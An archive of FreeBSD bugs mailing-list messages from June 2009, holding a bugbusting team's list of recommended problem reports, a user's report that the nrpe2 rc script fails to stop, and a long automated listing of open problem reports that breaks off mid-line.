2 problems total. Problem reports for tag 'zyd': S Tracker Resp. Description -------------------------------------------------------------------------------- f usb/117150 weongyo [zyd] usb zyd device under moderate load panics system 1 problem total. From owner-freebsd-bugs@FreeBSD.ORG Mon Jun 22 11:15:34 2009 Return-Path: Delivered-To: freebsd-bugs@FreeBSD.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id B7610106587F; Mon, 22 Jun 2009 11:15:34 +0000 (UTC) (envelope-from owner-bugmaster@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id A15EE8FC0C; Mon, 22 Jun 2009 11:15:34 +0000 (UTC) (envelope-from owner-bugmaster@FreeBSD.org) Received: from freefall.freebsd.org (linimon@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5MBFYHR029594; Mon, 22 Jun 2009 11:15:34 GMT (envelope-from owner-bugmaster@FreeBSD.org) Received: (from linimon@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5MBF1wn029382; Mon, 22 Jun 2009 11:15:01 GMT (envelope-from owner-bugmaster@FreeBSD.org) Date: Mon, 22 Jun 2009 11:15:01 GMT Message-Id: <200906221115.n5MBF1wn029382@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: linimon set sender to owner-bugmaster@FreeBSD.org using -f From: FreeBSD bugmaster To: freebsd-bugbusters@FreeBSD.org, freebsd-bugs@FreeBSD.org Cc: Subject: PRs recommended for committer evaluation by the bugbusting team X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list Reply-To: freebsd-bugbusters@FreeBSD.org, freebsd-bugs@FreeBSD.org List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 22 Jun 2009 11:15:39 -0000 This is an experimental report from the bugbusting team containing PRs that we think are ready for evaluation by any interested committer. The idea is to try to match up people who are interested in going through the PRs with committers that are interested in helping. It is generated from the file /home/linimon/public_html/recommended.prs on freefall. This is intended to be a highly-filtered list to see if we can get more people interested in bugbusting without being overwhelmed by the large number of PRs. An HTML version of this report is available at http://people.freebsd.org/~linimon/studies/prs/recommended_prs.html. Please give feedback on this report to linimon@FreeBSD.org. Thanks. 133786 freebsd- kern open serious high current-us [netinet] [patch] ip_input might cause kernel panic 133733 freebsd- kern suspended non-criti low current-us [pci] [patch] Incorrect record in pci_vendors for Broadcom MiniPCI-E card 133239 freebsd- kern open non-criti low current-us [ae] [jme] [patch] if_jme can assign duplicate MAC address 133110 freebsd- docs open non-criti low current-us [patch] Typo corrections for /usr/src/UPDATING 132785 freebsd- usb open non-criti low current-us [usb] [patch] Gemtech remote powersocket is classed as a HID device rather than ugen 132193 freebsd- docs open non-criti low current-us [patch] description in the malo(4) manpage incorrect 131995 freebsd- kern open serious medium current-us [nfs] Failure to mount NFSv4 server 131314 freebsd- amd64 open serious low current-us [modules] [panic] large modules fail to load on amd64 129173 freebsd- usb open non-criti low current-us [uplcom] [patch] Add support for Corega CG-USBRS232R as a serial port 128608 freebsd- kern open non-criti low current-us [pccbb] [patch] add support for powering down and up Cardbus cards 127581 freebsd- kern open non-criti low current-us [patch] [acpi_sony] Add support for more Sony features 127549 freebsd- usb suspended non-criti low current-us [umass] [patch] Meizu MiniPlayer M6 (SL) requires some quirks 127331 edwin bin analyzed non-criti medium current-us [patch] top(1) only shows cputime used by one process thread 125139 philip kern analyzed non-criti low current-us [patch] [ata] bugs in ATAPI CD tray control 124621 freebsd- kern feedback non-criti low current-us [ext3] [patch] Cannot mount ext2fs partition 124064 freebsd- kern open serious high current-us [ar] [patch] cannot handle >16 serial number with Intel MatrixRAID 121899 freebsd- kern open serious medium current-us [ar] [patch] Drive detached from Intel Matrix RAID and returned comes up as entirely new ataraid 121755 freebsd- usb open serious high current-us [ohci] [patch] Fix panic after ohci/uhub cardbus device eject 120515 freebsd- kern open non-criti low current-us [acpi] [patch] acpi_alloc_wakeup_handler: can't alloc wake memory 120073 freebsd- kern open non-criti low current-us [new driver] [patch] add support for Meinberg PCI-based GPS reference clock 118238 freebsd- kern analyzed serious medium current-us [bce] [patch] bce driver shows "no carrier" on Intel SBXD132 blade (based on IBM HS21) 118222 freebsd- kern open serious high current-us [pxeboot] [patch] FreeBSD 7.0 PXE + NFS / "Can't work out which disk we are booting from" on AMD CPU 116697 kmacy kern analyzed non-criti low current-us [net] [patch] ifconfig's name argument has no effect on /dev/net/ 116643 freebsd- bin open non-criti low current-us [patch] [request] fstat(1): add INET/INET6 socket details as in NetBSD and OpenBSD 115623 imp kern analyzed non-criti low current-us [cardbus] [patch] Xircom CardBus Ethernet II 10/100 Adapter (CBE2-100) doesn't work [regression] 115196 bushman kern open non-criti medium current-us [libc] [patch] [request] Implement getgroupmembership(3) for massive performance gain when using LDAP or Winbind 113060 freebsd- usb analyzed non-criti low current-us [usbdevs] [patch] Samsung printer not working in bidirectional mode 102834 freebsd- bin analyzed serious low current-us [patch] mail(1) hangs on the sigsuspend system call in popen.c 102211 freebsd- kern open serious high current-us [ar] [patch] detach raid member and reboot will cause panic (ICH7) 100018 freebsd- bin open non-criti low current-us [patch] newsyslog(8) does not check size if time_at is used 96840 freebsd- bin analyzed serious low current-us [libc] [patch] getgrent() does not return large groups via NIS 95459 freebsd- kern open serious high current-us Rebooting the system while rebuilding RAID (Intel MatrixRAID) results in data loss 90815 freebsd- kern analyzed serious medium current-us [smbfs] [patch] SMBFS with character conversions sometimes hangs 90687 avg bin open non-criti low current-us [patch] side effect of -delete option of find(1) 74453 freebsd- usb suspended non-criti low current-us [umass] [patch] Q-lity CD-RW USB ECW-043 (ScanLogic SL11R chipset) does not work 73337 freebsd- conf open non-criti low current-us [nsswitch.conf] [patch] potential invalid free 63064 freebsd- kern open non-criti low current-us [patch] strptime(3) fails on %z From owner-freebsd-bugs@FreeBSD.ORG Mon Jun 22 12:50:06 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 16E6D1065674 for ; Mon, 22 Jun 2009 12:50:06 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id CCD218FC15 for ; Mon, 22 Jun 2009 12:50:05 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5MCo5Mw000275 for ; Mon, 22 Jun 2009 12:50:05 GMT (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5MCo5Da000274; Mon, 22 Jun 2009 12:50:05 GMT (envelope-from gnats) Resent-Date: Mon, 22 Jun 2009 12:50:05 GMT Resent-Message-Id: <200906221250.n5MCo5Da000274@freefall.freebsd.org> Resent-From: FreeBSD-gnats-submit@FreeBSD.org (GNATS Filer) Resent-To: freebsd-bugs@FreeBSD.org Resent-Reply-To: FreeBSD-gnats-submit@FreeBSD.org, Tony den Haan Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id DA9CA106567D for ; Mon, 22 Jun 2009 12:48:49 +0000 (UTC) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (www.freebsd.org [IPv6:2001:4f8:fff6::21]) by mx1.freebsd.org (Postfix) with ESMTP id AF2878FC21 for ; Mon, 22 Jun 2009 12:48:49 +0000 (UTC) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.14.3/8.14.3) with ESMTP id n5MCmnXr062103 for ; Mon, 22 Jun 2009 12:48:49 GMT (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.14.3/8.14.3/Submit) id n5MCmmNn062102; Mon, 22 Jun 2009 12:48:48 GMT (envelope-from nobody) Message-Id: <200906221248.n5MCmmNn062102@www.freebsd.org> Date: Mon, 22 Jun 2009 12:48:48 GMT From: Tony den Haan To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-3.1 Cc: Subject: misc/135916: nrpe2 rc script stop failing X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 22 Jun 2009 12:50:06 -0000 >Number: 135916 >Category: misc >Synopsis: nrpe2 rc script stop failing >Confidential: no >Severity: serious >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Jun 22 12:50:05 UTC 2009 >Closed-Date: >Last-Modified: >Originator: Tony den Haan >Release: 6.3 >Organization: >Environment: FreeBSD salsa.sp.nl 6.3-RELEASE-p1 FreeBSD 6.3-RELEASE-p1 #1: Thu Mar 20 16:15:32 CET 2008 root@gazpachoNEW.cherry.sp.nl:/usr/obj/usr/src/sys/GAZPACHO i386 >Description: #/usr/local/etc/rc.d/nrpe2 stop nrpe2 not running? (check /var/spool/nagios/nrpe2.pid). in /etc/rc.conf i only have nrpe2_enable="YES" and in /usr/local/etc/nrpe2.cfg there is pid_file=/var/spool/nagios/nrpe2.pid I see same problem on multiple systems. >How-To-Repeat: /usr/local/etc/rc.d/nrpe2 stop >Fix: >Release-Note: >Audit-Trail: >Unformatted: From owner-freebsd-bugs@FreeBSD.ORG Mon Jun 22 11:06:05 2009 Return-Path: Delivered-To: freebsd-bugs@FreeBSD.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 491BB1065672 for ; Mon, 22 Jun 2009 11:06:05 +0000 (UTC) (envelope-from owner-bugmaster@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id 313368FC1A for ; Mon, 22 Jun 2009 11:06:05 +0000 (UTC) (envelope-from owner-bugmaster@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5MB65H6017032 for ; Mon, 22 Jun 2009 11:06:05 GMT (envelope-from owner-bugmaster@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5MB62hL017026 for freebsd-bugs@FreeBSD.org; Mon, 22 Jun 2009 11:06:02 GMT (envelope-from owner-bugmaster@FreeBSD.org) Date: Mon, 22 Jun 2009 11:06:02 GMT Message-Id: <200906221106.n5MB62hL017026@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: gnats set sender to owner-bugmaster@FreeBSD.org using -f From: FreeBSD bugmaster To: FreeBSD bugs list X-Mailman-Approved-At: Mon, 22 Jun 2009 12:53:11 +0000 Cc: Subject: Current problem reports X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 22 Jun 2009 11:06:05 -0000 (Note: an HTML version of this report is available at http://www.freebsd.org/cgi/query-pr-summary.cgi .) The following is a listing of current problems submitted by FreeBSD users. These represent problem reports covering all versions including experimental development code and obsolete releases. S Tracker Resp. Description -------------------------------------------------------------------------------- o ports/135911 [MAINTAINER] security/gpgme: Update to version 1.2.0 o ports/135910 [maintainer-update] Port www/zope311 o ports/135909 comms/mgetty port defaults to non-existant serial port o ports/135908 marcus Fix MySpaceIM for net-im/libpurple o ports/135907 miwi [Maintainer Update]science/py-netCDF4:update to 0.8.1 o ports/135906 itetcu [MAINTAINER-UPDATE] mail/postfix-postfwd from 1.10.8b o ports/135905 [MAINTAINER] net-mgmt/zabbix: update to 1.6.5 o ports/135904 [MAINTAINER] net-mgmt/zabbix-agent: update to 1.6.5 o ports/135903 Update port: multimedia/cx88 Add support for CX23885/7 o ports/135902 itetcu [MAINTAINER-UPDATE] mail/postfix: un-IGNORE VDA patch o ports/135900 beat [MAINTAINER] sysutils/lcdproc: update to 0.5.3 o ports/135899 amdmi3 Update port: multimedia/libtuner Add MT2131/CX24227 tu o kern/135898 geom [geom] Severe filesystem corruption - large files or l f ports/135897 amdmi3 New port: net-im/freetalk console based Jabber client f ports/135896 amdmi3 [PATCH] textproc/xerces-c2: mark MAKE_JOBS_UNSAFE o ports/135895 miwi [maintainer update] multimedia/abby to 0.3.0 o ports/135894 miwi [maintainer update] multimedia/cclive to 0.4.4 o bin/135893 vmstat(8): 'vmstat -s -M core' is broken f ports/135892 amdmi3 New port science/peekabot f kern/135891 vwe [acpica] bug in acpica/psparse.c o ports/135890 miwi [PATCH] archivers/xar: Take maintainership o ports/135888 miwi [PATCH] irc/xaric: Take maintainership f ports/135887 miwi [UPDATE] databases/mantis: update to 1.1.8 o ports/135886 New port: net-p2p/vhcp Verlihub control panel o ports/135884 dhn [maintainer] www/p5-RT-Extension-LDAPImport update to o ports/135883 shaun [PATCH] lang/gcc295: Unbreak build o kern/135882 jhb MFc reminder: memstat_kvm_malloc broken in 7.2-STABLE o ports/135881 dhn [maintainer] www/p5-RT-Extension-SLA -- add pkg_messag o ports/135880 miwi [NEW PORT]math/p5-Math-Evol:Perl module implements the o ports/135879 vd [Update]graphics/vigra:update to 1.6.0 o ports/135877 lbr [PATCH] databases/p5-DBIx-Class: update to 0.08107 o ports/135876 dhn New port ftp/bareftp o ports/135875 acm foo2zjs port getweb script fails (print/foo2zjs) o kern/135874 geom [geom] [patch] geom_linux_lvm misses newer fedora defa o www/135873 www last core election information is wrong o ports/135870 miwi [NEW PORT] sysutils/xfce4-power-manager: XFce4 power m o ports/135868 araujo [PATCH] science/elmerpost: Fix problem with patch. f ports/135867 net-im/gajim 0.12.3: wrong $path in bin file o ports/135866 miwi sysutils/xfce-cpugraph-plugin fixes for amd64 o ports/135863 miwi [NEW PORT]biology/pycogent:A toolkit for statistical a o ports/135860 kde [PATCH] x11/kdebase3: Unbreak on -CURRENT o ports/135859 girgen Update to latest version of databases/py-PyGreSQL o ports/135858 marcus [PATCH] ports-mgmt/portlint: Tweak existing features + o usb/135857 usb RTL8187 Wireless Adapter o ports/135856 miwi [NEW PORT]biology/rubygem-bioruby:Integrated environme o ports/135854 dhn [PATCH] lang/pnet: Update version to 0.8.0. Take maint o ports/135853 dhn [PATCH] lang/ml-pnet: update to 0.8.0 o ports/135852 mnag [PATCH] www/lighttpd: update to 1.4.23 f ports/135846 miwi [Update]dns/py-dnspython:update to 1.7.1 o ports/135845 miwi [Maintainer Update]devel/rubygem-uuid:update to 2.0.2 o ports/135843 obrien Update port editors/vim o ports/135842 clsung [PATCH] sysutils/p5-mogilefs-server: update to 2.30 o ports/135841 clsung [PATCH] sysutils/p5-MogileFS-Utils: update to 2.14 o kern/135836 net [bce] bce BCM5709 Watchdog after warm boot - ok after o ports/135835 miwi security/pear-Auth files in wrong directory o ports/135833 wxs [PATCH] lang/neko: update to 1.8.0 o ports/135832 python security/py-pycrypto: Deprecation warnings when used w f ports/135831 [MAINTAINER] java/sqlitejdbc: update to 056 f kern/135824 [panic] Fatal trap 12: page fault while in kernel mode o kern/135823 top(1) shows wrong CPU usage for multithreaded applica o ports/135821 skv [PATCH] www/p5-WWW-Yandex-TIC: update to 0.06 o ports/135818 skv [PATCH] www/p5-URI-ParseSearchString: update to 3.1 o ports/135817 skv [PATCH] www/p5-HTTP-DAV: update to 0.38 o ports/135816 chinsan [PATCH] www/p5-HTML-WikiConverter-MediaWiki: update to o ports/135815 chinsan [PATCH] www/p5-HTML-Seamstress: update to 5.0c o ports/135813 chinsan [PATCH] www/p5-HTML-Element-Library: update to 3.53 o ports/135812 tobez [PATCH] www/p5-Continuity: update to 1.01 o ports/135806 skv [PATCH] www/p5-Catalyst-Engine-HTTP-Prefork: update to f ports/135804 pgollucci [PATCH] www/p5-CGI-Application-Server: update to 0.061 f ports/135803 pgollucci [PATCH] www/p5-CGI-Application-Plugin-Stream: update t f ports/135802 pgollucci [PATCH] www/p5-CGI-Application-Plugin-DevPopup: update f ports/135801 pgollucci [PATCH] www/p5-CGI-Application-Plugin-AutoRunmode: upd f ports/135800 pgollucci [PATCH] www/p5-CGI-Application-Dispatch: update to 2.1 o ports/135798 skv [PATCH] textproc/p5-XML-NamespaceSupport: update to 1. o ports/135796 tobez [PATCH] textproc/p5-XML-Atom-SimpleFeed: update to 0.8 f ports/135792 pgollucci [PATCH] sysutils/p5-Sysadm-Install: update to 0.28 f ports/135787 pgollucci [PATCH] net/p5-Net-Write: update to 1.05 o ports/135784 lippe [PATCH] net/p5-Net-Google-AuthSub: update to 0.5 o ports/135783 tobez [PATCH] math/p5-Statistics-Descriptive: update to 3.00 o ports/135781 tobez [PATCH] mail/p5-Mail-Box: update to 2.090 o ports/135780 tobez [PATCH] mail/p5-Email-Send: update to 2.197 o ports/135779 tobez [PATCH] graphics/p5-URI-GoogleChart: update to 1.01 o ports/135776 chinsan [PATCH] finance/p5-Business-OnlinePayment-PaymenTech: o ports/135775 skv [PATCH] devel/p5-prefork: update to 1.03 o ports/135774 skv [PATCH] devel/p5-namespace-autoclean: update to 0.07 o ports/135771 lippe [PATCH] devel/p5-Test-YAML-Meta: update to 0.12 o ports/135769 timur [PATCH] devel/p5-Test-MockTime: update to 0.12 o ports/135767 tobez [PATCH] devel/p5-Set-Scalar: update to 1.24 o ports/135766 tobez [PATCH] devel/p5-Return-Value: update to 1.666001 o ports/135764 skv [PATCH] devel/p5-Parse-Method-Signatures: update to 1. o ports/135763 chinsan [PATCH] devel/p5-Params-Util: update to 1.00 o ports/135762 skv [PATCH] devel/p5-POE-Component-DirWatch: update to 0.2 o ports/135761 skv [PATCH] devel/p5-POE-API-Peek: update to 1.34 o ports/135759 skv [PATCH] devel/p5-MooseX-Types-Structured: update to 0. o ports/135756 chinsan [PATCH] devel/p5-MooseX-Storage: update to 0.18 o ports/135751 skv [PATCH] devel/p5-Inline: update to 0.45 o ports/135750 skv [PATCH] devel/p5-IO: update to 1.25 o ports/135749 timur [PATCH] devel/p5-File-ExtAttr: update to 1.09 o ports/135748 skv [PATCH] devel/p5-Devel-PartialDump: update to 0.08 o ports/135746 skv [PATCH] devel/p5-Devel-Declare: update to 0.005006 o ports/135745 timur [PATCH] devel/p5-DateTime-Format-Natural: update to 0. o ports/135743 skv [PATCH] devel/p5-Data-UUID: update to 1.202 f ports/135736 pgollucci [PATCH] devel/p5-Class-Gomor: update to 1.02 o ports/135735 skv [PATCH] devel/p5-Cache-FastMmap: update to 1.30 o ports/135734 tobez [PATCH] devel/p5-Badger: update to 0.06 o ports/135733 skv [PATCH] devel/p5-B-Hooks-OP-Check: update to 0.17 o ports/135727 tobez [PATCH] databases/p5-DBIx-Perlish: update to 0.53 o ports/135724 skv [PATCH] databases/p5-DBD-mysql: update to 4.011 o ports/135723 tobez [PATCH] databases/p5-Cache-Memcached-Fast: update to 0 o ports/135722 skv [PATCH] converters/p5-Convert-Binary-C: update to 0.74 o ports/135720 mat [PATCH] devel/perltidy: update to 20090616 f ports/135719 [patch] multimedia/mplayer: Fix segfaults when playing o bin/135718 [patch] enhance qsort(3) to properly handle 32-bit ali o bin/135710 fs mount(8): mount -t tmpfs does not follow 'size' option o ports/135709 [NEW PORT] www/gallery3 f ports/135707 miwi [PATCH] net/tcpillust: update to 2.01, unbreak on 8-CU f ports/135703 Updated port databases/slony1 f ports/135702 amdmi3 Update port print/hplip to 3.9.6 o bin/135700 [patch] Add an ability to run inetd(8) with P_PROTECTE o ports/135699 obrien editors/vim: tries to fetch wrong distfile o ports/135696 mm [PATCH] irc/tr-ircd: unbreak on 8-CURRENT f ports/135694 [PATCH] palm/pilot-link: Unbreak on 8-CURRENT f ports/135693 miwi [Maintainer Update]www/elgg:update to 1.5 f kern/135692 [mtx] [witness] blockable sleep lock - kernel panic on o ports/135691 sem ports-mgmt/portupgrade Wrong example in man page of pk f kern/135690 [panic] [ata] ufs_dirbad: /backuphd: bad dir ino 22259 o ports/135689 obrien editors/vim broken (tries to download patch "7.2.041%" o ports/135683 tabthorpe [new port] ports-mgmt/symports: Automatically generate o ports/135681 novel [patch] security/gnutls-devel update to 2.9.1 o ports/135680 novel [patch] security/gnutls update to 2.8.1 o ports/135679 novel [patch] security/libtasn1 update to 2.2 o docs/135676 doc FAQ About The FreeBSD Mailing Lists doesn't mention ma o ports/135674 portmgr [PATCH] some PHP-related knobs should be placed before o ports/135673 ale databases/mysql50-server - MySQL query lock-ups on 7.2 o ports/135670 ale [PATCH] databases/mysql50-server: in mysql-client mysq o kern/135667 [lor] LORs causing ufs filesystem corruption on XEN Do o ports/135664 [PATCH]: bsd.ldap.mk: Detect flavour of installed open o ports/135663 portmgr [PATCH]: bsd.port.mk: move pkg_install commands detect f ports/135660 Update net/jicmp to 1.0.10 o ports/135659 ade Update devel/automake110 to 1.10.2 f ports/135656 Update devel/p5-Class-Gomor to 1.0.2 o ports/135652 [PATCH] www/gforge: Removed BROKEN. Take maintainershi o ports/135650 lwhsu [NEW PORT] www/yii: A high-performance component-based o ports/135649 portmgr Mk/bsd.port.mk: [patch], fix documentation relating to o bin/135647 cperciva freebsd-update(8): forces manual merge of every file i f ports/135633 araujo lang/pnetlib. Take maintainership. p kern/135628 remko [umass] [patch] add a device quirk for Myson Heden 881 o ports/135625 ahze devel/distcc ports has wrong PATCH_SITES locations f ports/135624 wxs [PATCH] ports/security/tor-devel o ports/135623 netchild mail/claws-mail does not install "enchant" when instal o ports/135622 delphij net/openldap2[34]-client: PKGNAME does not accurately f ports/135621 wxs [PATCH] ports/sysutils/fusefs-kmod o ports/135619 bland devel/py-icu - Package py25-icu-0.8.1 in 7.2-RELEASE f f i386/135609 vwe FreeBSD reboot during high cpu load. o kern/135608 [patch] sysctl should be able to handle byte values f ports/135606 araujo New port: multimedia/mp3cd. mp3cd is a perl script tha o ports/135604 danger upgrade textproc/sphinxsearch-devel to RC2 f ports/135603 pgollucci [PATCH] www/campsite: apache@ cleanups f ports/135602 pgollucci [PATCH] graphics/mapserver: USE_APACHE=yes is deprecat o kern/135594 fs [zfs] Single dataset unresponsive with Samba o ports/135593 shaun net-im/ejabberd: ram_file_io_server makes ejabberdevel f ports/135592 amdmi3 New Port: emulators/bsnes Snes Emulator BSnes o ports/135589 gnome databases/evolution-data-server: doesn't configure wit o misc/135588 embedded [nanobsd] simple patch for adding amd64 support o kern/135585 bz [ip6] net.inet6.ip6.accept_rtadv=1 removes a cloning r o ports/135582 nivit [maintainer update] multimedia/clive -> 2.2.0 o power/135576 ppc gdb cannot debug threaded programs on ppc o usb/135575 usb [usbdevs] [patch] Add HTC Wizard phone vid/pid informa r ports/135572 portmgr [REPOCOPY] www/squid30 -> www/squid31 o ports/135570 gabor change var "CONFLICTS=" in Makefile of emulators/linux o ports/135569 portmgr `check-sanity` not oicumented in bsd.port.mk o bin/135565 randi [patch] a patch for sysinstall(8) to look at UFS parti r ports/135563 portmgr [REPOCOPY] www/py-meld to www/py-meld3 o bin/135562 randi sysinstall(8): Filesystem operations should only be pe o bin/135559 randi route table shouldn't automatically be deleted with pr o ports/135557 miwi [NEW PORT] sysutils/py25-supervisor: A client/server s o kern/135556 multimedia [snd_hda] Sound (mostly) broken w/ snd_hda on -CURRENT f ports/135553 pgollucci [PATCH] www/websh: Mark MAKE_JOBS_UNSAFE=yes f ports/135552 pgollucci [PATCH] www/woadaptor: Mark MAKE_JOBS_UNSAFE=yes s kern/135550 [sysctl] [request] Feature Request: Manufacturer Infor f ports/135547 erwin databases/flamerobin: remove support for firebird1 o kern/135546 fs [zfs] zfs.ko module doesn't ignore zpool.cache filenam s ports/135544 [patch]net-im/qwit suffers from twitpocalypse o ports/135543 az upgrade games/lincity-ng to 2.0 o usb/135542 usb [keyboard] boot loader does not work with a usb keyboa f ports/135541 [PATCH] math/p5-NetCDF cannot load module with netcdf- f ports/135538 pgollucci [PATCH] textproc/xerces-c2-devel: Mark MAKE_JOBS_UNSAF o ports/135536 chinsan [PATCH] net/xmlrpc-c: Mark MAKE_JOBS_UNSAFE=yes f ports/135534 wxs mail/postfix ignoring 'reject_authenticated_sender_log o ports/135528 itetcu Fix audio/exaile-devel regression when installing with r ports/135526 portmgr [REPOCOPY] devel/py-jsonlib -> devel/py-jsonlib2 o docs/135520 doc [patch] typos in fail(9) o docs/135516 doc pax(1) manual not mentioning chflags unawareness o ports/135511 miwi [maintainer update] Update port: databases/rubygem-do_ o ports/135510 miwi [maintainer update] Update port: databases/rubygem-do_ o ports/135508 New port: databases/py-postgresql, Python3.x adapter f a ports/135503 wxs lang/python26 upgrade should get mailman too o kern/135502 net [periodic] Warning message raised by rtfree function i o ports/135500 obrien net/rdesktop sound does not work [PATCH] o kern/135497 [ata] JMicron JMB363 controller does not recognize PAT o ports/135486 hrs print/acroread9 crashes after maybe 10 seconds of oper o kern/135485 [modules] [patch] During a shutdown, kernel modules sh o ports/135484 python port lang/python and python26 build failed o ports/135483 dinoex print/cups-base doesn't find .ppd files when built wit o kern/135480 fs [zfs] panic: lock &arg.lock already initialized o kern/135476 ipfw [ipfw] IPFW table breaks after adding a large number o o docs/135475 doc [patch] jot(1) manpage and behaviour differ o ports/135474 ale [PATCH] Mk/bsd.php.mk: add possibility to redefine PHP o ports/135471 secteam [patch] ports-mgmt/portaudit-db packaudit.conf sourced o kern/135469 fs [ufs] [panic] kernel crash on md operation in ufs_dirb o kern/135468 dchagin broken detection of Linux binaries via ".note.ABI-tag" o ports/135467 eclipse can not build java/eclipse with WITHOUT_MOZILLA=yes WI o ports/135466 sem ports-mgmt/portupgrade leaves orphaned lock files sinc o www/135465 www FreeBSD cvsweb reporting inaccurate logs? o threa/135462 threads [PATCH] _thread_cleanupspecific() doesn't handle delet o ports/135460 danfe [PATCH] astro/stellarium: update to 0.10.2 o kern/135458 dchagin Missing errno translation in Linux getsockopt(,,SO_ERR a ports/135453 wxs [MAINTAINER] deskutils/plasma-applet-quicklauncher: Ma p kern/135451 yongari [fxp] no wol capability in fxp-driver for 82801-based o www/135448 jkois Please add our company description to the ISP listing. s i386/135447 amd64 [i386] [request] Intel Core i7 and Nehalem-EP new feat o bin/135444 cperciva freebsd-update(8) failing should be more verbose f ports/135442 mkntfs from sysutils/ntfsprogs don't seems to work o ports/135441 cjh [PATCH] korean/ko-hanterm: fix for NOPORTDOCS o ports/135437 skv lang/perl5.8: [regression] /usr/local/lib/perl5/site_p o ports/135436 pgollucci [NEW PORT] audio/audex: Audio CD ripper for KDE4 f ports/135435 avl Upgrade of the net-mgmt/NetXMS port to the most recent f ports/135433 amdmi3 print/scribus 1.3.3.11_1: Story editor truncates and c f ports/135432 amdmi3 print/scribus 1.3.3.11_1 compiliation failure f i386/135427 vwe [ath] [hang] System freezes when loading Atheros drive o ports/135426 ale databases/mysql51-server: making package fails with BU f ports/135425 skreuzer [PATCH] sysutils/nvclock: update to 0.8b4 f ports/135423 dinoex ports/print/cups-base port downloads corrupt files f ports/135422 amdmi3 print/scribus. Update to version 1.3.3.13 o kern/135421 xen [xen] FreeBSD Xen PVM DomU network failure - netfronc. o misc/135420 bugmeister gnats generates broken In-Reply-To headers o ports/135418 wxs Can not disable NETFLOW plugin debug in net/ntop 3.3.9 p bin/135417 brian [patch] man(1): man -k overrides $PATH for $PAGER f ports/135415 araujo lang/pnet-base. Removed broken, update, plist correted o kern/135412 fs [zfs] [nfs] zfs(v13)+nfs and open(..., O_WRONLY|O_CREA o kern/135408 [aac] Adaptec 5405 RAID controller hanging under high f ports/135398 portmgr lang/perl5.6 is dead, remove PERL_LEVEL/PERL_VERSION < o ports/135397 lev [PATCH] devel/subversion: devel/apr WITH_BDB related c f ports/135394 amdmi3 [PATCH] graphics/gdal: mark MAKE_JOBS_UNSAFE o ports/135388 mm lang/tcl84 spins on closed tty OR the return of ports/ f ports/135387 pgollucci [UPDATE] x11-toolkits/php-gtk adde PORTSCOUT limit o ports/135383 anders [UPDATE] multimedia/ffmpeg2theora to 0.24 o usb/135372 usb Quirk report for Teclast TL-C300 usb media player f ports/135370 skreuzer [PATCH] devel/pstreams: Fix Custom Prefix mtree issue f ports/135369 skreuzer [PATCH] audio/tuneradio: Fix Custom Prefix mtree issue o ports/135367 amdmi3 [maintainer update] Update port: databases/rubygem-do_ o ports/135366 matusita japanese/skk-jisyo port is still broken. o www/135365 www Broken link in man.cgi f ports/135362 miwi [maintainer update] Update port: databases/rubygem-dat o bin/135349 acpi [patch] teach acpidump(8) to disassemble arbitrary mem o usb/135348 usb [umass] USB Drive Hangs with ZFS (JMicron USB2/eSata) o ports/135346 makc Update audio/amarok-kde4 to version 2.1 o ports/135345 makc New port: audio/taglib-extras o ports/135344 makc New port: devel/qtscriptgenerator o ports/135341 emulation [PATCH] linux-f10 ports that install manpages: add NOM o conf/135338 pf startup order seems broken o ports/135337 emulation [PATCH] emulators/linux_base-f10: incorrect bash usage o ports/135334 portmgr [exp-run] change linux defaults to Fedora 10 at 8-CURR o bin/135333 Non-integer decimal numbers not allowed in sysinstall( o ports/135332 sobomax net/asterisk16 doesn't work with Makefile.local o ports/135330 lippe [PATCH] devel/st: return back missed file into library o ports/135323 beech [PATCH] ftp/proftpd giving up on fetching files: mod_c o ports/135322 Port graphics/linux_dri has incorrect 